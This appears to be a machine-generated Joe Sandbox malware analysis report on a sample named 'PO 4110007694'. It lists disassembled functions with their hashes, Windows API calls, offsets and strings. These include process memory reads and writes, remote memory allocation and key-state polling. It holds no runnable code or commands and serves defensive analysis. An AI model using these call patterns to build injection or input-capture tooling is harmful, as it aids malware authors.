                                                                    • Instruction ID: 4c091bc5549c90bf297f7b8192df18f869baa94a33808e4cb04544a150d19a0d
                                                                    • Opcode Fuzzy Hash: 8bd79d75679c4ad9e02aeb7a34bdf1787f3c2e43c2aa6c46fffd22d04cce9e84
                                                                    • Instruction Fuzzy Hash: 25510D35A00109DFDB01EF64C995AADBBF5EF09314F1480A9E859AB3A1CB31EE51EF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c043d2bd719ff39dfa3a74b4f2af5181e103e50def2d52ebe16331e1202caea8
                                                                    • Instruction ID: 50aaca754c58241f503f3c4f02b5b9fa0941a0e7161018cb34afb19a45a13cc7
                                                                    • Opcode Fuzzy Hash: c043d2bd719ff39dfa3a74b4f2af5181e103e50def2d52ebe16331e1202caea8
                                                                    • Instruction Fuzzy Hash: 22418035905214EFDB24DB68CC4DFADBBA4EB09310F150166F926A72E1C730AE51EA91
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00C12357
                                                                    • ScreenToClient.USER32(00CD57B0,?), ref: 00C12374
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00C12399
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00C123A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: 81d01d7a8e1a0f1d587feb9f9cc0f2cd88a01f651fe11599ad9427270c86a13c
                                                                    • Instruction ID: cee532b595ddfde912f0e750f3d9ac5fe25c3bfc445b1fca94dcf81959df6b8c
                                                                    • Opcode Fuzzy Hash: 81d01d7a8e1a0f1d587feb9f9cc0f2cd88a01f651fe11599ad9427270c86a13c
                                                                    • Instruction Fuzzy Hash: EE415439504115FFDF199F69C888AEDBB74FB05360F50435AF839921A0C7349EA4EB91
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C663E7
                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00C66433
                                                                    • TranslateMessage.USER32(?), ref: 00C6645C
                                                                    • DispatchMessageW.USER32(?), ref: 00C66466
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C66475
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                    • String ID:
                                                                    • API String ID: 2108273632-0
                                                                    • Opcode ID: dc07324fc6edd798faae0b864639c5d8d6e87e3a4edeecef844f18b40dfb76c4
                                                                    • Instruction ID: 41f15b90e7fb93b72399366f221b2650febac687c063a8ac6b911c0cc7142374
                                                                    • Opcode Fuzzy Hash: dc07324fc6edd798faae0b864639c5d8d6e87e3a4edeecef844f18b40dfb76c4
                                                                    • Instruction Fuzzy Hash: 1B31A171941646AFDB34CFB1DC88BBABBE8AB01304F14017AE435C31A1EB359989DB60
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00C68A30
                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00C68ADA
                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C68AE2
                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00C68AF0
                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C68AF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: 21e3d80b0ed633579305c3803e4618abc39beff68ed22bd423a20fc71e1ec1f0
                                                                    • Instruction ID: 3376c8a3ca939b1530519511bbdf126e4562af1f96b84a4029297ccc54386183
                                                                    • Opcode Fuzzy Hash: 21e3d80b0ed633579305c3803e4618abc39beff68ed22bd423a20fc71e1ec1f0
                                                                    • Instruction Fuzzy Hash: 4531C071500219EFDF24CFA8DD8CB9E3BB5EB04315F10822AF925E61D1C7B09A58EB90
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00C6B204
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C6B221
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C6B259
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C6B27F
                                                                    • _wcsstr.LIBCMT ref: 00C6B289
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C9B192
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C9B1B7
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C9B1CF
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00C9B1F8
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C80E90,00000000), ref: 00C9B216
                                                                    Similarity
                                                                    • API ID: Window$Long$MetricsSystem
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C69320
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C69352
                                                                    • __itow.LIBCMT ref: 00C6936A
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C69392
                                                                    • __itow.LIBCMT ref: 00C693A3
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow$_memmove
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00C85A6E
                                                                    • GetForegroundWindow.USER32 ref: 00C85A85
                                                                    • GetDC.USER32(00000000), ref: 00C85AC1
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00C85ACD
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00C85B08
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    APIs
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C1134D
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C1135C
                                                                    • BeginPath.GDI32(?), ref: 00C11373
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C1139C
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C74ABA
                                                                    • __beginthreadex.LIBCMT ref: 00C74AD8
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00C74AED
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C74B03
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C74B0A
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C6821E
                                                                    • GetLastError.KERNEL32(?,00C67CE2,?,?,?), ref: 00C68228
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00C67CE2,?,?,?), ref: 00C68237
                                                                    • HeapAlloc.KERNEL32(00000000,?,00C67CE2,?,?,?), ref: 00C6823E
                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C68255
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?,?,00C67455), ref: 00C67127
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67142
                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C67150
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?), ref: 00C67160
                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C67044,80070057,?,?), ref: 00C6716C
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C75260
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C7526E
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C75276
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C75280
                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C68121
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C6812B
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C6813A
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68141
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C68157
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00C6C1F7
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C6C20E
                                                                    • MessageBeep.USER32(00000000), ref: 00C6C226
                                                                    • KillTimer.USER32(?,0000040A), ref: 00C6C242
                                                                    • EndDialog.USER32(?,00000001), ref: 00C6C25C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    APIs
                                                                    • EndPath.GDI32(?), ref: 00C113BF
                                                                    • StrokeAndFillPath.GDI32(?,?,00C4B888,00000000,?), ref: 00C113DB
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C113EE
                                                                    • DeleteObject.GDI32 ref: 00C11401
                                                                    • StrokePath.GDI32(?), ref: 00C1141C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    APIs
                                                                      • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                      • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C17A51: _memmove.LIBCMT ref: 00C17AAB
                                                                    • __swprintf.LIBCMT ref: 00C22ECD
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C22D66
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 1943609520-557222456
                                                                    APIs
                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                    • CoInitialize.OLE32(00000000), ref: 00C7B9BB
                                                                    • CoCreateInstance.OLE32(00CA2D6C,00000000,00000001,00CA2BDC,?), ref: 00C7B9D4
                                                                    • CoUninitialize.OLE32 ref: 00C7B9F1
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                    • String ID: .lnk
                                                                    • API String ID: 2126378814-24824748
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00C350AD
                                                                      • Part of subcall function 00C400F0: __87except.LIBCMT ref: 00C4012B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__87except__start
                                                                    • String ID: pow
                                                                    • API String ID: 2905807303-2276729525
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$_memmove
                                                                    • String ID: ERCP
                                                                    • API String ID: 2532777613-1384759551
                                                                    APIs
                                                                      • Part of subcall function 00C714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C69296,?,?,00000034,00000800,?,00000034), ref: 00C714E6
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C6983F
                                                                      • Part of subcall function 00C71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C714B1
                                                                      • Part of subcall function 00C713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C71409
                                                                      • Part of subcall function 00C713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C6925A,00000034,?,?,00001004,00000000,00000000), ref: 00C71419
                                                                      • Part of subcall function 00C713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C6925A,00000034,?,?,00001004,00000000,00000000), ref: 00C7142F
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C698AC
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C698F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C9F910,00000000,?,?,?,?), ref: 00C979DF
                                                                    • GetWindowLongW.USER32 ref: 00C979FC
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C97A0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C97461
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C97475
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C97499
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C97C4A
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C97C58
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C97C5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: 4832bf7bc8434ecbdc591665546d68f1a35da41646bf36cd75bd37ad586dce98
                                                                    • Instruction ID: 10c1d45c7efca7da64d5ec62b41c28a03edb027abb231a24cb8848786fac74f8
                                                                    • Opcode Fuzzy Hash: 4832bf7bc8434ecbdc591665546d68f1a35da41646bf36cd75bd37ad586dce98
                                                                    • Instruction Fuzzy Hash: B0218CB5615209AFDB10DF28DCC5EAB37ECEF4A354B140159FA119B3A1CB31EC51AAA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C96D3B
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C96D4B
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C96D70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
